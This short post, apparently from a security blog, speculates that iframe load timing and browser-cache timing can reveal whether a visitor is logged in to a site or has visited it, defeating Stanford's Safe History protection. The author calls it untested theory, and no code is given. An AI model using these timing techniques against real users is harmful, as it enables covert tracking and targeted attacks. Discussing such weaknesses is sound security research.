Let’s think about this… If I can stop an iframe from loading and test if it has completed loading or not, I can send it to a URL that acts differently based on the time required to load a page in varying states. If it takes longer for a page to load if the user is signed in than it does when they aren’t it’s another potential way to do targeted attacks. Even assuming the CSS history attack that Jeremiah came up with is disabled by something like Stanford’s Safe History I can still tell if they are in authenticated states on websites that have this issue.
Since I’m on a roll talking about Stanford security today, let’s completely break Safe History by testing if they have been to a website before by detecting how long it takes them to load a website before and after going to it (if it’s cached it should be basically instant). Of course all of this is theory and I haven’t tested any of it, but I’ll be curious to hear people’s thoughts once they do. Cross domain restrictions seem to be getting more and more fuzzy lately.